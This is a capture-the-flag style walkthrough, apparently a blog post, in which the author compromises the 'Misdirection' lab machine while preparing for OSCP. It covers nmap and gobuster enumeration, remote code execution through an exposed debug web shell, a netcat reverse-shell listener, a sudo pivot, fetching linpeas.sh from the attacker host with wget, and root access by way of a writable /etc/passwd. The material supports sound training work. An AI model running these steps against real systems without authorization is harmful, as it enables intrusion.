OSCP Preparation [Misdirection]

j1gs@w
4 min readJul 25, 2023

--

This would be the 6th machine I’m doing for my OSCP Preparation and I gotta say it was pretty easy XD.

The first step is to find out what is our target machine’s IP address. We can do that by doing a host scan on our network.

sudo nmap -sn 192.168.110.0/24 -oN nmap_discovery

Knowing 192.168.110.133 is our attacker machine’s IP address, we can identify that 192.168.110.144 is our target. Once our target has been identified, we can now perform port scanning on our target with the following:

sudo nmap -sC -sV -Pn -p- 192.168.110.144-oN nmap_port_scan
  • -sC : Load default nmap scripts
  • -sV : Version scan
  • -Pn : Assume all hosts are up
  • -p- : Scans for all 65535 ports
  • -oN : Outputs file in normal format

The results of the port scan reveal that these services are being hosted on the target:

  • SSH
  • a Web Server
  • a second Web Server
  • MySQL

With a web server available, directory brute forcing would be our next step. I used gobuster to get the directories on the web server

gobuster dir -u http://192.168.110.144 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .php,.html,.js,.css,.txt -t 100 -o directory_brute

dir : Uses gobuster for directory brute forcing

-u : The target’s URL

-w : The wordlist used to enumerate the web server’s directories

-x : Extensions added to the end of every word within the wordlist

-t : Threads used

-o : The output file

For whatever reason, I could not enumerate the first web server so I moved on to the second web server.

From that, we got some interesting directories!

These directories caught my eye:

  • help
  • wordpress
  • development
  • shell
  • debug

However, help development and shell revealed nothing of use and I was too lazy to enumerate WordPress so I moved on to the debug directory. Right there I found a debug shell (hence the directory name lol)

Having a shell here means we have remote code execution.

Now that we have remote code execution (RCE), let’s find a reverse shell on PayloadsAllTheThings and let’s listen on port 4444

nc -lvnp 4444

This OpenBSD netcatreverse shell seems to work!

Let’s upgrade our shell to make it more interactive with python

python -c 'import pty;pty.spawn("/bin/bash")'

With our current user, let’s see whether we have sudo capabilities with:

sudo -l

It seems that we can launch /bin/bash as the user brexit. Using the following command allows us to interact with the target through the user brexit

sudo -u brexit /bin/bash

From there, we can access the home directory of brexit and get the user flag.

From here we can use linpeas.sh to automate the enumeration of the target to find privilege escalation vectors. First, I’ll setup a python server on my host on port 80:

python -m http.server 80

Then retrieve it from the victim with wget in a writable directory

wget <http://192.168.110.133/linpeas.sh>

Make linpeas.sh executable

chmod +x linpeas.sh

Launch it

./linpeas.sh

And linpeas.sh found that /etc/passwd is writable!

As /etc/passwd is writable, we can add a new root user into that file with our own password and log into it! So let’s generate our new password with openssl

Then, edit the root entry to this

With that, append the entry to the target’s /etc/passwd file

Finally, switch to the user you have set and get the root flag!

In summary, this challenge is REALLY simple and it reminds me to do proper enumeration of the system as the target might not have only one instance of the service available. If you didn’t perform a proper enumeration then you might get a MISDIRECTION! XD

--

--

No responses yet